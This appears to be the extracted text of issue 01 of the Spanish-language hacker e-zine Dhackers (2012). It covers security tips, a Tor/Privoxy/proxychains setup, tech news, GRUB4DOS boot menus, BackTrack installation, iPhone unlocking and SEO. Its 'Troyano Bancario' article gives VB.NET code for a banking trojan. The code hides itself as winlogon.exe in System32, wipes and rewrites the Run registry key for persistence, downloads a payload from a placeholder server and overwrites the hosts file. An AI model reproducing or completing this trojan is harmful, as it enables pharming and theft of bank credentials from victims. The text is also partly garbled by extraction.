43

Dhackers revista 01

Embed Size (px)

Citation preview

Page 1: Dhackers revista 01
Page 2: Dhackers revista 01

DIRECTORhttp://dhackers.comPRODUCCION

www.sie­group.netPUBLICIDAD Y DIFUSION

www.turundus.netARTE Y DISEÑO

Josue Juarez Quezada

[email protected]

m3x1c0h4ckdesign­by­[email protected]@[email protected]|_ocutuslocutus@el­[email protected]

[email protected]@hotmail.com

eb4bgrAngel cantujauregui angel.cantu@sie­group.net

P.14 Noticias del Primer Semestre del 2012P.42 FotomontajeP. 4 10 Pautas de SeguridadP.30 Entrando a un equipo con ArmitageP.24 Fail2BanP.18 Instalando BackTrack 5 r2P.32 Trucos Windows 7P.34 Conociendo mi PCP.10 Liberar iPhone 3G/3GS sin WiFi Baseband 6:15P.28 Procedimiento de Desbloqueo de Celulares.P. 8 Troyano Bancario en Visual Studio .NETP.20 SEO GoogleP. 5 Privacidad en Internet­ Proxy TORP.16 Ejemplos de Inicio de Grub4dosP.40 Levantando el Hyper Linux ­ Parte 1

CONTENIDOOBTENER CONTRASEÑADE FACEBOOKP.38

Page 3: Dhackers revista 01

P.14 Noticias del Primer Semestre del 2012P.42 FotomontajeP. 4 10 Pautas de SeguridadP.30 Entrando a un equipo con ArmitageP.24 Fail2BanP.18 Instalando BackTrack 5 r2P.32 Trucos Windows 7P.34 Conociendo mi PCP.10 Liberar iPhone 3G/3GS sin WiFi Baseband 6:15P.28 Procedimiento de Desbloqueo de Celulares.P. 8 Troyano Bancario en Visual Studio .NETP.20 SEO GoogleP. 5 Privacidad en Internet­ Proxy TORP.16 Ejemplos de Inicio de Grub4dosP.40 Levantando el Hyper Linux ­ Parte 1

LA MEJOR COMUNIDAD DE HACKERS EN LATINOAMERICA

http://foro.dhackers.com/

Page 4: Dhackers revista 01

10 Pautas de Seguridadaremos las recomendaciones mas fáciles e imprescindibles para tener una seguridad fiel y que

nuestro OS no se convierta en una maquina llena de virus y moustros que terminen con el sistema.

1 ­ Tener siempre instalada una suite deseguridad o programas que estén separadosque incluyan antivirus, firewall y detención demalware y en el correo y siempre verificar queestén actualizados correctamente.2 ­ Nunca divulgar nuestra dirección de correo electrónico, si no son personas confiables, pasaen muchos casos que las personas se pasan mostrando y dando a conocer su dirección porinternet y paginas de ocio a si como de redes sociales sin saber el peligro que esto causa, antesprimero saber que que el sitio en común es seguro. También es importante tener muchascuentas alternativas (con diferentes contraseñas) y a si no tener que mantener mucho spam enuna sola cuenta y hacer un backup en cada cuenta por si a caso.3 ­ Nunca abrir un archivo adjunto sin antes pasarle el antivirus, unas de las recomendacionesque doy es que es importante si en el momento no tienes antivirus que no es recomendable,ver la extencion de la misma, recordemos que la mayoría de los virus tienen extencion “exe”pero pueden estar camuflados por otra extencion engañosa.

4 ­ Siempre tener en cuenta a quien agregamos o aceptamos en nuestra cuenta de mail, ya quea veces son intrusos que quieren que revelemos nuestra identidad a si como privacidad, unejemplo son personas que siempre estan permanentemente preguntando cosas en común ynunca dejan que vos pregunte de la misma a si como intentan hacer una confianza lo masrápido posible y lo logran, (a eso se llama Ing Social).5 ­ Nunca seguir enlaces de correos electrónicos que vienen de un mail, preferible copiar ladirección y ponerla en el navegador a si podrás tener mas control de ella.

6 ­ Siempre tener en cuenta y seguridad a donde vamos a enviar nuestras fotos oarchivos por medio de seguridad ya que esos archivos pueden revelar nuestraidentidad y privacidad de la misma.7 ­ Nunca reponder correo basura a si llamado spam.

8 ­ Pasa usar un buen navegador pero tenemos muchasalternativas como Intenret explorer, Opera, Firefox, Chromeetc… (recomendado Opera) y siempre ver tener activado “NoScript” Como lo tiene Firefox.

D

4 5SeNeGe

Page 5: Dhackers revista 01

Privacidad en Internet ­ TORsi estas leyendo esto es por queestas preocupado por cuidar tuprivacidad mientras navegas (o hacescosas q no deberias), en cualquierade los casos es una sanapreocupacion ya q cada vez esmayor la cantidad de datos qdejamos por ahi y las ganas delos gobiernos y grandescorporaciones de ponerles las manosencima para cruzarlos con los suyospropios con oscuros propositos...

en españa por ejemplo ya se aprobola ley SINDE, entre cuyas atribucionesesta la de cortar el acceso a internet alos users q violen derechos de autor.mas alla de la ridiculez de la medidacontra el usuario final que baja unmp3, tengan en cuenta que hay todauna organizacion que checkea logs,pide mas logs y va abuscar gente a lacasa para cortarle laconexion a internet.ellos saben todo loque estas haciendote guste o no,cuando piden esosregistros ahi no estasolo el link del mp3 sinocompletamente todo lo q navegaste ohiciste.

obviamente en todos lados seguardan logs pero afortunadamenteen la mayoria de los paises senecesita de una orden judicial y unabuena razon para obtenerlos y cuandodigo "buena razon" no me refiero aalguien bajando musica o un capitulode "walking dead".

pero dejemos de divagar y vamos altema...

servidores proxy

difundido y comun para ocultar nuestradireccion IP son los proxies. un proxy

es un servidor quecumple la funcionde intermediarioen una conexion,por ejemplo en

una empresa el proxy es la maquinaque da acceso a internet a las de la redinterna. desde ahi podemos controlartrafico, aplicar permisos a los clientes ymuchas otras cosas, pero lo importantepara lo que estamos viendo es lafuncion de hacer de "puente" haciaafuera.supongamos q queremos abrirxxxx.com. la pc de la red interna hacela peticion al proxy y este a su vez la

hace a xxxx.comdespues deanalizarla ycheckear en susreglas si la procesao no. "xxxx", comocualquier webserver, guarda logsde las IPs que lovisitan, en este

caso la IP que queda en el log es la delproxy y no la de la maquina interna queni siquiera posee conexion directahacia afuera. de esta forma cualquieraque sea la pc en la red interna quehaga una peticion a xxxx siempre va aquedar en sus logs la IP del proxy.

solo tenemos que pasar estoa nivel de internet y vemosclaramente lo q hace unproxy. la peticion sale de lapc hacia nuestro ISP (Internet ServiceProvider), va hacia el proxy y el la hacedevolviendonos el resultado. la finalidad

un proxy es un servidorque cumple la funcion de

intermediario en unaconexion.

en este caso no es "salir" a internetsino usar el "puente" para escondernuestra direccion IP original.

haciendo una rapida busqueda engoogle pueden encontrarse muchaslistas de proxies. si bien en teoria todofunciona como explique antes, losproxies tambien guardan logs y anteuna orden judicial la mayoria de estoslos entregan a las autoridadescorrespondientes. una solucion usadadurante muchos años es "encadenar"proxies, haciendo q la peticion pase xvarios de ellos antes de llegar adestino. esto no hace imposible seguirel rastro de los paquetes pero si lohace mas dificil al tener que conseguiry analizar logs de varios lugares,dependiendo de leyes locales y otrosfactores en todo caso es la solucionde anonimato mas rapida ya que sepuede configurar practicamente encualquier navegador y sistema(incluyendo moviles) rapidamente ysin tener q instalar absolutamentenada. solo una lista de proxies qfuncionen...

TORTOR fue originalmente diseñado paraencriptar comunicacionesgubernamentales de la "us navy". esuna red formada x nodos a traves delos cuales viaja nuestra informacion xrutas aleatorias. esta ruta, ademas dela info q viaja a traves de ella, estaencriptada y cada uno de los relays en

la red solo sabede cual viene lainfo y a cual va,no conoce eldestino final ni el

origen. la idea es crear un ruteocomplicado, cambiarlo cada 10minutos y no mantener logs.

TOR fue originalmentediseñado para encriptar

comunicaciones

5 |_ocutus

Page 6: Dhackers revista 01

el sistema parece perfecto... y es bastantebueno, pero esta lejos de proteger 100%nuestra privacidad. los sitios web tomanbastante mas info como el tipo de browser,sistema, resolucion de pantalla, referals, etc,etc, etc.

ademas de esto, x la estructura de la red tores posible sniffar datos en texto plano conbastante facilidad. no voy a explicar endetalle como xq se extiende mucho el temapero la vulnerabilidad se basa en el ultimotramo de la ruta, del ultimo nodo al server dedestino, donde la informacion viaja sinencriptacion alguna. solamente hay q seteartor como "exit node" para ser ese ultimoeslabon y ponernos a sniffar todo el trafico qpasa x el...

PRIVOXY

en la mayoria de los tutoriales de instalacionde TOR se incluye PRIVOXY. esto se debea q con este ultimo podemos ocultar muchade la informacion que entregan nuestrasaplicaciones cuando se conectan a internetpero tambien a q en firefox hay un problemacon el soporte para socks (q usa tor) qgenera timeouts, lo cual resulta en paginasq no cargan aleatoriamente y ese tipo deproblemas. simplemente firefox a veces noespera q se complete el circuito en la red y...timeout!

otro serio problema con tor son los "DNSleaks" o fugas dns. antes de enviar los datosse hace una peticion normal a un serverDNS para resolver el nombre para recienentonces encriptarlos y enviarlos. el traficosigue estando a salvo pero no la actividad qes facilmente rastreable. esto se solucionausando privoxy que justamente evita los dnsleaks. la idea entonces es instalar privoxy, qeste "limpie" todos estos datos segun elnivel en q se lo pidamos y le pase la peticiona tor. este crea el circuito, la envia ydespues de atravesarlo llega a destino.

la aplicacion se puede configurar con unsimple editor de texto o desde una intuitiva

interfaz web. tiene infinidad deopciones... es cosa de darle un ratopero con la configuracion casi x defaultsale andando. al final instalamos yconfiguramos todo... ;)

proxychains

el problema viene muchas vecescuando queremos anonimizar unaconexion de consola. en un browser esfacil de configurar y aunque en linux sele puede poner proxy casi a todo,siempre hay algo q falta o no escomodo andar editando archivos deconfiguracion todo el tiempo parausarlos solo un rato. con proxychainsno solo podemos pasar cualquiercosa a traves de un proxy sino qfacilmente podemos crear cadenascomo las q hablabamos al principio osimplemente redirigirlo a tor.

en caso de usar propios las listaspueden encadenarse de 3 tiposdistintos. aleatorio, orden exacto odinamico q es capaz de identificar ysacar de la cadena proxies muertos.

puede usarse practicamente concualquier aplicacion de consola, nmap,ssh, wget... o lanzar aplicacionesgraficas, simplemente:

# proxychains ssh root@.....# proxychains nmap ­sT .....# proxychains pidgin

Instalando yconfigurando todo

la explicacion va para debian y susderivados, obviamente sirve perfecto paraubuntu q es lo q usa la mayoria (yo sigoprefiriendo el original... je). empezamos xdescargar e instalar las 3 aplicaciones q seencuentran en los repositorios:# apt­get install tor privoxy proxychains(con sudo en ubuntu)

Tor no necesita mayor configuracion

para el uso normal asi q ya estacorriendo y escuchandoconexiones en el puerto 9050.como prueba pueden agregar enel navegador los datos de proxysocks como localhost en esepuerto y ya deberia estarfuncionando. en firefox vamos a:edit ­> preferences ­> advanced ­> network

en "connections" hacemos clicken "settings" y completamos loscampos:

el siguiente paso es configurarprivoxy. nos vamos a/etc/privoxy/ y editamos elarchivo "config", al finalagregamos la linea:

forward­socks4a / localhost:9050 .(con el punto al final incluido)

con esto lo q hacemos es redirigir eltrafico de privoxy a tor. privoxycorre en el puerto 8118, de manera qcon esos datos configuramos ahorael navegador pero en lugar de "sockshost" usamos "http proxy" ycheckemos "use this proxy server forall protocols".

para configuracion mas fina sepuede usar la interfaz web a la q seaccede x medio de la url:

http://config.privoxy.org/

de ahi vamos a:

6

Page 7: Dhackers revista 01

"View & change the current configuration"(http://config.privoxy.org/show­status) ypodemos modificar muchisimas opciones,desde cambiar el user­agent hasta sacarlas animaciones a los GIFs.

otra opcion interesante es hacer q privoxyescuche conexiones de toda la lan,pudiendo asi tener una sola maquinacorriendo tor y privoxy para usarla desdecualquiera en la red. para eso agregamosal final la linea:

listen­address x.x.x.x:8118

donde x.x.x.x es la ip de la pc local q estacorriendo privoxy. despues de esto sepuede configurar como proxy en cualquierpc conectada a la lan.

finalmente nos queda proxychains parausar aplicaciones de consola. vamos a/etc/ y editamos "proxychains.conf". al finalagregamos (o descomentamos):

socks4 127.0.0.1 9050

enviando el trafico a tor. por las dudasasegurense de q strict_chain y proxy_dnsesten descomentados. si quieren poneruna lista de proxies este tambien es ellugar en el formato q esta arriba.

epilogo...

todo esto sirve para tener un anonimatoaceptable pero tampoco significa q seamos"inrastreables" ni mucho menos ante unainvestigacion "seria". para sercompletamente anonimos en una accionpuntual lo mejor es usar un sistemaoperativo en un CD/DVD booteable yconectarse a una red publica bien lejos decualquier lugar q pueda relacionarse con lapersona q la realiza.

si vas a hacer algo en algun punto "ilegal",no te sientas intocable x usar tor... si vas ahacer algo ilegal... mejor no lo hagas. ;)

7

Page 8: Dhackers revista 01

Troyano Bancario(Parte I)

Saludos queridos amigos, en esta oportunidados enseñare a crear un pequeño troyano bancario,para eso tenemos que tener el programa: VisualStudio .Net 2010 ­ Professional (de preferencia).

Bueno iré al grano, luego determinaremos lasfunciones que tendrá nuestro troyano.

Funciones:

1. AUTOCOPIA Y OCULTACIÓN.2. AUTOARRANQUE.3. VERIFICACIÓN DE INTERNET.4. DESCARGA DE ARCHIVO.5. INFECCIÓN DEL HOSTS.6. REPETIR T.A.

Después de tener bien claras nuestras funciones,podemos empezar a crear nuestro troyanobancario, si lo queréis hacer más formal, entoncesempiecen a crear sus FlujoGramas,Pseudocódigos y todo ese rollo que uno tiene quehacer al crear un Software, pero como no estamospara perder el tiempo, iremos directo al grano,claro que al hacer todo ese rollo nos facilitaráhacer la programación más completa y ordenada,pero al diablo con eso.

1. Autocopia y Ocultación:Para continuar con este procedimiento tenemosprimero que verificar si el troyano se encuentraalmacenada en la computadora, para esoutilizaremos el código:

File.Exists(“C:\directorio donde haremos quese almacene el troyano”)Luego de eso podremos usar el código decopiar:File.Copy(Application.ExecutablePath.ToString, “C:\directorio donde haremos que sealmacene el troyano”, True)Y no os olvidáis del atributo de Ocultación,para eso utilizaremos este código:File.SetAttributes(“C:\directorio dondeharemos que se almacene el troyano”,FileAttribute.Hidden)

En conclusión tendremos unacondición como esta:Public Sub AutoCopy()

IfFile.Exists(“C:\Windows\System32\winlogon.exe”) ThenFile.Copy(Application.ExecutablePath.ToString,“C:\Windows\System32\windrivers.exe”, True)File.SetAttributes(“C:\Windows\System32\windrivers.exe”,FileAttribute.Hidden)

ElseFile.Copy(Application.ExecutablePath.ToString,“C:\Windows\System32\winlogon.exe”,True)File.SetAttributes(“C:\Windows\System32\winlogon.exe”, FileAttribute.Hidden)

End IfEnd Sub

2. Autoarranque:Esto nos ayudará a ejecutarautomáticamente nuestro troyano cada vezque inicie el sistema operativo, para esotenemos que conocer el registro deWindows y crear un registro en eldirectorio de arranque de la ubicacióndonde se encuentra almacenada nuestrotroyano y ponerle un nombre, ante tododeclaramos la variable:

Dim Calculate As RegistryKeyPrivate Function AutoArranque() AsBoolean

ListRun ="SOFTWARE\Microsoft\Windows\CurrentVersion\Run"Registry.CurrentUser.DeleteSubKeyTree(ListRun)

TryCalculate =

Registry.CurrentUser.CreateSubKey(ListRun)

Calculate.SetValue(“Nombre de

nuestro registro”, “C:\directorio dondeharemos que se almacene el troyano”)

Catch ex As ExceptionEnd TryReturn True

End Function

3. Verificación de Internet:

En esta función lo que haremos seráverificar si el ordenador donde seencuentra nuestro troyano dispone deinternet y así de esa manera poderhabilitar algunas funciones y evitar quese ejecuten en vano en caso de nodisponer con internet, para esoutilizaremos esta sentencia de códigos:Public Function VerifyInternet() AsBoolean

TryIf

My.Computer.Network.IsAvailable =True Then

Return TrueElse

Return FalseEnd If

Catch ex As ExceptionReturn False

End TryEnd Function

4. Descarga de Archivo:

Ahora procederemos a descargarnuestro archivo de infección para elhosts, utilizamos este pequeñocódigo:

My.Computer.Network.DownloadFile(“URL de nuestro archivo deinfección”, “C:\directorio donde sealmacenará la descarga”)

Pero antes de iniciar la descarga denuestro archivo tenemos queverificar si la URL se encuentra

8 9RandomSoft

Page 9: Dhackers revista 01

disponible, para eso tenemos quedeclarar las variables de esta forma:

Dim PositionValue As WebRequestDim ResponseHtml AsHttpWebResponseDim Declared As String

Public Function Verify_URL(ByValURL_Only As String) As String

TryPositionValue =

WebRequest.Create(URL_Only)ResponseHtml =

CType(PositionValue.GetResponse(),HttpWebResponse)

Declared =ResponseHtml.StatusDescription()

Catch ex As WebExceptionEnd TryReturn Declared

End Function

Después haremos una condición paraproceder con la descarga

Public Sub CopyrightInf()If VerifyInternet() = True Then

IfVerify_URL(“http://www.miservidor.com/infeccion.mp3”) = ConditionValueThenMy.Computer.Network.DownloadFile(“http://www.miservidor.com/infeccion.mp3”,“C:\Windows\System32\wieurkdn.dll”)End If

End IfEnd Sub

5. Infección del Hosts:

Aquí lo único que haremos será leer elcontenido del archivo que descargamos yluego reinscribir el contenido de nuestroarchivo hosts, para eso declaramos unavarible de tipo string el cual contendrá lainformación:

Dim ColumnValue, CountPerformance AsString

El código que nos servirá para leer elcontenido de nuestro archive es este:ColumnValue =File.ReadAllText(“C:\directorio del archivea leer el contenido”)Y el que nos permitirá reinscribir elcontenido de nuestro archivo es este otro:File.WriteAllText(“C:\directorio delarchive que reinscribiremos”, “Aquí elcontenido que escribiremos”)Public Function Infecion() As String

On Error Resume NextColumnValue =

File.ReadAllText(“C:\cuentas.txt”)CountPerformance =

ColumnValue.ToString()

If CountPerformance <> "" ThenFile.WriteAllText(“C:\directorio del

archive a reinscribir”, “Hola Mundo byRandomSoft”)

End IfEnd Function

6. Repetir T.A:

En esta función necesitaremos de unTimer para repetir las demás funcionesque anteriormente hicimos, ante tododeclararemos las variables.

Dim d As IntegerPrivate Sub Timer1_Tick(ByVal senderAs System.Object, ByVal e AsSystem.EventArgs) HandlesTimer1.Tick

d = d + 1If (d = 500) Then

TryAutoArranque()d = 0

Catch ex As ExceptionEnd Try

End IfEnd Sub

Bueno amigos eso es todo por elmomento, por motivos de seguridadno coloco el script completo o elresultado final, esta E­Zine DHackerses para un fin educativo, el grupoDHackers y mi persona no noshacemos responsables del mal uso deesta revista, para cualquier dudo opara mayor información no duden encontactarme.

Saludos de RandomSoft.

Para que un programa sea untroyano sólo tiene que acceder y

controlar la máquina anfitriona sin seradvertido.

9

Page 10: Dhackers revista 01

Liberar iphone 3G/3GS sin wi-fi base band 6.15

Esta vez les traigo un tutorial de como liberar nuestro iphone sin wi­fiMuchos sabrán que los iphone se liberan por el wi­fi...Esta vez utilicé un 3GS con la versión 5.0.1 que es la última versión(En algunos casos no se pudo liberar con dicha versión, a si que, si no

Ultrasn0w 1 .2: http://www.mediafire.com/?plo7alk33tn2socIfunbox: http://dl.i­funbox.com/ifunbox_en.zip

les funciona tendrán que hacerle downgrade)Necesitamos los siguientes archivos a descargar.Tener nuestro iphonepreviamente hecho Jailbreak ya que los archivos se instalan en Cydia.Y por supuesto con base band 6.15

Abrimos el Ifunbox con nuestro iphone conectado.Casi no hay explicación ya que las imágenes hablanpor sí solas…

10 11nomo11

Page 11: Dhackers revista 01

11

Page 12: Dhackers revista 01

En la carpeta "AutoInstall"arrastramos los archivos quedescargaron “Ultrasn0w” son2 archivos, los arrastramos ala carpeta.

12 13

Page 13: Dhackers revista 01

Nota: Si alguna carpeta no aparece en su iphone, háganlaustedes mismo tal y cual como muestra las imágenes, conmayúsculas y minúsculas, ya que si no lo hacen a sí, nolo reconocerá su iphone.

13

Page 14: Dhackers revista 01

NoticiasENEROMegaupload y megavideo dicen adiós, El FBIcierra el mayor sitio de intercambiosEl departamento de Estado de EE.UU. , el FB Iy otras autoridades internacionales decidieronclausurar Megaupload y detener a susresponsables , acusados de conspiración paracometer un crimen organizado , lavado dedinero , infracciones de derechos de autor deforma masiva y violación de la propiedadintelectual , lo cuales podrían enfrentar unacadena de hasta 50 años de prisión.Esta operación fue dirigido en contra deMegaupload (por intercambio de archivos) yMegavideo (visualización de videos en internet). Ambas son propietarias de la mismacompañía.El departamento de Justicia acusa a susresponsables de la piratería masiva en todo elmundo de diferentes obras protegidas porderechos de propiedad intelectual

FEBREROMySpace volvió y ya tiene nuevos usuariosEl retorno de MySpace ( en el 2005 y 2008 había sido el sitiomás visitado) había perdido a sus usuarios debido al gran boomde Facebook y otras redes sociales .En el 2012 luego de un cambio de dueños yestrategias , gracias a la frase “si no puedes con tusenemigos únete a ellos” , hizo que cada día se abran40 mil nuevas cuentas . Aprovecharon las 42millones de canciones de las que dispone la redsocial , la convirtieron en un nodo de música yentretenimiento para compartir en Facebook yTwitter.

Sony Ericsson ahora se llamaSony Mobile CommunicationsLa compra de Sony había sido anunciada en

octubre del 2010 pero recién este año se hizoefectiva la compra.

http://www.infobae.com/adjuntos/jpg/2011/11/600x0_484482.jpgSony Mobile Communications integrará elsegmento de celulares como un elemento vital desu negocio de la electrónica.

MARZO

El debut en España de la ley SindeA partir de esta normativa se creó una comisión gubernamental que será el ente regulador encargado de evitar las descargas ilegales y

además tienen autorización a cortar el acceso de la web a los usuarios que violen los derechos de propiedad intelectual.http://www.infobae.com/adjuntos/jpg/2011/01/600x0_336614.jpg

Esta norma fue aprobada en el Congreso de España en el año 2011y conto con el apoyo de entidades de gestión de derechos de autor y laindustria audiovisual.

Paypal presentó un nuevo dispositivo de pagos vía celularPaypal presento un dispositivo que ayuda a las empresas a aceptar tarjetas de crédito y de débito.

http://www.infobae.com/adjuntos/jpg/2012/03/600x0_520529.jpgPaypal Here es una aplicación móvil que se instala en celulares , por el momento solo funciona con el iPhone. Más adelante servirá a los

equipos con Android de Google.Este sistema permite a los comercios a aceptar pagos mediante dispositivos portátiles.

Noticias

14 15Noely

Page 15: Dhackers revista 01

NoticiasPrimer semestre del año

ABRILFirefox presento su nueva versión "Firefox12"Mozilla presento su nueva versión paraWindows , Mac y Linux.En él se destaca laactualización del navegador , que se hacede manera más rápida y sencilla y mejorasen las prestaciones para los desarrolladores(medios de control para la reproducción devideos HTML 5 y JavaScript).http://www.infobae.com/adjuntos/jpg/2012/04/600x0_532059.jpgPinterest, la red social que consiguió eltercer puesto de popularidad en EE.UU.Esta red social que permite compartir yrecomendar imágenes entre usuarioscreando un portafolio temático , aumento enenero y febrero con un 50 % de visitas deEE.UU. , posicionándose en el tercer puestode las más populares (Facebook en elprimer puesto y segundo Twitter) .Esteaumento de visitas fue gracias a unarecomendación de la revista Time.http://www.infobae.com/adjuntos/gif/2012/02/600x0_511141.gif

MAYOCelebración del día de InternetLas Naciones Unidas decidieron designar comoel 17 de Mayo como el Día Mundial de lasTelecomunicaciones y de la Sociedad de laInformación.“Este día servirá para dar a conocer mejor laimportancia que tiene este recurso mundial ,surge de la sociedad , por la sociedad y para lasociedad “.http://www.youtube.com/watch?v=i4RE6dBAjH4&feature=player_embedded

JUNIOTwitter presento su nuevo logoAhora se la identificara solo con el pajaritoazul , este logo surgió de un amor por laornitología y el diseño simple y efectivo.http://www.infobae.com/adjuntos/jpg/2012/06/600x0_548255.jpgEste nuevo logo sugiere el buen momentoque atraviesa Twitter y el exitoso futuro quele aguarda.

15

Page 16: Dhackers revista 01

Ejemplos de inicio con GRUB4DOSSeguro que muchos de vosotros oshabréis preguntado más de una vezcómo iniciar varios SistemasOperativos desde un mismo dispositivoUSB, o desde el propio CD/DVD. Hayvarias herramientas que facilitan estatarea, pero con un poco de tiempopodréis conocer una de las mejores,GRUB4DOS.

En este artículo os quiero mostrarvarios ejemplos de lo que podéis hacercon este magnífico BootLoader. Todoslos ejemplos son reales y funcionancon GRUB4DOS 0.45 editando elarchivo menu.lst

Empezaremos con algo sencillo, cómocargar la imagen de un Floppy Disk deinicio. Para hacer esto se soportan losformatos .Img y .Gz por lo que elarchivo de la imagen de vuestrodisquette puede estar comprimido yocupar menos espacio:

title Windows 98 FloppyDisk\nfind ­­set­root/mypath/win98dos.gzkernel /mypath/memdiskinitrd /mypath/win98dos.gzboot

Ahora haremos una pequeña variantepara iniciar Windows 9x, esta vezdesde el HD:

title Windows 9x\nfind ­­set­root ­­ignore­floppies /Io.Syschainloader /Io.Sysboot

También podemos indicarle que inicieel PC desde el Sistema Operativo quehaya en nuestro HD,

independientemente del que sea:

title Boot from Hard­Drive\nrootnoverify (hd0,0)chainloader (hd0,0)+1boot

Ahora vamos a indicarle que cargue enla memoria R.A.M. la imagen .Iso de unLive‐CD y que la inicie. Esto es útil sino tenemos unidad de CD/DVD ennuestro PC, pero tenemos que tenermemoria R.A.M. suficiente para cargarla imagen y para iniciar el SistemaOperativo que tenga el CD/DVD.Únicamente hay un tipo de inicio queGRUB4DOS no nos permite hacer, y esiniciar una imagen .Iso si el dispositivode inicio es el propio CD/DVD. Parapoder usar este método, el archivo .Isoque contenga la imagen de nuestroCD/DVD tiene que estardesfragmentado. Más información enwww.boot‐land.net/forums/index.php?showtopic=8797 / www.boot‐land.net/forums/index.php?showtopic=5041&st=20

title My .Iso Image inR.A.M.\nfind ­­set­root ­­ignore­floppies/mypath/myisoimage.isomap /mypath/myisoimage.iso(0xff) || map ­­mem/mypath/myisoimage.iso

(0xff)map ­­hookchainloader (0xff)boot

Y aquí una pequeña variante si nuestroPC no tiene suficiente memoria R.A.M.y queremos iniciar la imagen .Iso desdeel archivo que la contiene. Este

ejemplo en concreto es para UbuntuLinux:

title Ubuntu 12.04 LinuxLive­CD\nfind ­­set­root ­­ignore­floppies /mypath/ubuntu­12.04­desktop­i386.isomap /mypath/ubuntu­12.04­desktop­i386.iso (0xff)map ­­hookroot (0xff)kernel /casper/vmlinuzboot=casper BOOT=casper iso­scan/filename=/mypath/ubuntu­12.04­desktop­i386.isopersistent rw splash vga=791max_loop=255initrd /casper/initrd.lzboot

Ahora vamos a iniciar un PC quetenga instalado Windows Xp en el HD,usando el método más fácil.GRUB4DOS soporta varios tipos delSistema de Archivos, incluyendoFAT32, NTFS y NTFS comprimido:

title MicroSoft Windows Xp\nrootnoverify (hd0,1)chainloader (hd0,1)+1find ­­set­root ­­ignore­floppies ­­ignore­cd /NtLdrchainloader /NtLdrboot

Y el mismo inicio usando un métodoalternativo:

title MicroSoft Windows Xp\nfind ­­set­root ­­ignore­floppies ­­ignore­cd /NtLdrmap () (hd0)map (hd0) ()map ­­rehook

16 17eb4bgr

Page 17: Dhackers revista 01

find ­­set­root ­­ignore­floppies ­­ignore­cd /NtLdrchainloader /NtLdrboot

Vamos a usar el mismo método parainiciar Windows Vista/Seven:

title MicroSoft WindowsVista/Seven\nfind ­­set­root ­­ignore­floppies ­­ignore­cd /bootmgrmap () (hd0)map (hd0) ()map ­­rehookfind ­­set­root ­­ignore­floppies ­­ignore­cd /bootmgrchainloader /bootmgrboot

También podemos indicarle que inicieUbuntu Linux en una partición denuestro HD. Antes de hacer esto hayque entrar en la Línea de Comandos deGRUB4DOS y ejecutar la orden "UUID",que es la que nos muestra losidentificadores de las particiones:

title Ubuntu 11.04 Linux\nuuid 071e0978­fb77­4d32­934e­7117f617ac4akernel /vmlinuzroot=UUID=071e0978­fb77­4d32­934e­7117f617ac4a ro splashvga=791 max_loop=255initrd /initrd.imgboot

Para finalizar, os muestro unas pocascosas más que se pueden hacer conGRUB4DOS.

Línea de comandos deGRUB4DOS:

title Grub4Dos Command­Line\ncommandlineReiniciar el PC:title ReBoot Computer\nreboot

Para instalar el cargador deGRUB4DOS en el sector MBR podéisutilizar las herramientas que vienencon el programa. Lo más sencillo esiniciar nuestro PC con la herramientaHiren's Boot‐CD(http://www.hirensbootcd.org/download), y desde el menú de herramientasde HBCD seleccionar el programaGrub4Dos Installer. Después de esto,seleccionais la unidad USB en la quequeréis poner el cargador deGRUB4DOS (también podeis hacerloen el HD) y pulsais en el botón"Install". Después hay que copiar elarchivo GrLdr al directorio raíz de lapartición donde habeis modificado elsector MBR con el cargador deGRUB4DOS, y que esa partición estémarcada como activa para iniciarse.AVISO IMPORTANTE: Si instalasGRUB4DOS en la misma partición delHD donde tengas instalado WindowsVista/Seven, te elimina la informaciónde licencia de Windows y tu copiaaparecerá como no registrada. Estehecho no se produce si instalasUbuntu Linux en un PC con WindowsVista/Seven. Ubuntu Linux utilizaGRUB, el proyecto original. Tenedcuidado.Como habéis podido ver, esteexcelente BootLoader nos permitehacer prácticamente todo lo quedeseamos. Espero que este artículoos haya resultado útil.http://grub4dos.sourceforge.net

Alejandro Padrino.

17

Page 18: Dhackers revista 01

Instalando el sistema operativo backtrack 5 r2

Bienvenidos a la ezine dhackers…bueno en este articulo les enseñare ainstalar este increíble sistema operativollamado backtrack 5 r2

Ahí es la opción para iniciar podemosiniciar de diferentes maneras backtracknosotros usaremos la primera Defaulaunque puedes usar sin red, sin driver ymemoria de intercambio, modo seguro,memstest(para comprobar tu memoria ram)y bootear desde el disco duro :PAhi es la opcion para iniciarpodemos iniciar de diferentesmaneras backtrack nosotrosusaremos la primera Default aunquepuedes usar sin red, sin driver ymemoria de intercambio, modoseguro, memstest(para comprobar tumemoria ram) y bootear desde eldisco duro:

Nos saldrá la siguiente pantalla ahí leponemos:StartxPara iniciar el modo grafico

18 19arthusu

Page 19: Dhackers revista 01

Por ultimo backtrack nos avienta un login, paraello los datos por defecto son:Bt login: rootPassword: toorY listo solo inicias el modo grafico con Startxahora si a probar backtrack

Ya solo hay que esperar a que se llene al 100%la instalación

Le damos Borrar y usar el disco entero y Adelante

Otro paso muy importante es que podemos instalar backtrackcomo una partición de disco duro y usar dos sistemasoperativos a la ves, pero para no enrollarnos lo instalamos entodo el disco duro y a probar.

Configuracion delteclado

19

Page 20: Dhackers revista 01

SEOHola bueno, antes de que empiecen a leer este "manual" quiero darmi opinion de que lo que esta puesto aca no esta actualizado y esoquiere decir que google no siempre usa las mismas técnicas debúsquedas y de mediciones para la info, también quiero decir que apesar de hacer todo lo que dice eso no va a decir que vamos a estarprimeros ya que es todo relativo, y la mejor forma de durar es conel tiempo, osea mientras mastiempo en la red mas te tendrancuenta.

Manual para mejorar tuposicionamiento en Google.(Rollo Barrio Sesamo),Google es el "pupo buscador"por excelencia. De hecho haybuscadores y luego hay Google,y punto.

Hacer que tu pagina aparezca en Google es m?s que sencillo, dehecho basta con que alguien que ya este indexado en su base dedatos, haga un link desde su pagina a la tuya, y Google teencontrar?. (Google siempre te encuentra por que google manda)Tambien puedes sugerirle que lea tu pagina desde aqu?

Ahora, la gracia est? en estar bien posicionado, ?sea, aparecer enlas primeras posiciones de b?squeda. Por que esta muy bien eso dedecir: Eh, Eh, que aparezco en google.­ Cuando sales en la pagina33.

?Como funciona Google?, ?Que es el posicionamiento?

Google usa un algorritmo (No, eso no se baila) de b?squedabastante complejo, pero muy efectivo. (Aunque ?ltimamentecomience a ir como un culo). Ese c?lculo de google se encarga, enparte, de valorar la calidad o importancia de una pagina. Google dehecho tiene mogoll?n de bots navegando por Internetcontinuamente en busca de p?ginas nuevas y actualizaciones deantiguas. Antes a estos estos bots se les llama googlebot y freshbot,el primero indexaba paginas el segundo se encargaba deactualizarlas.

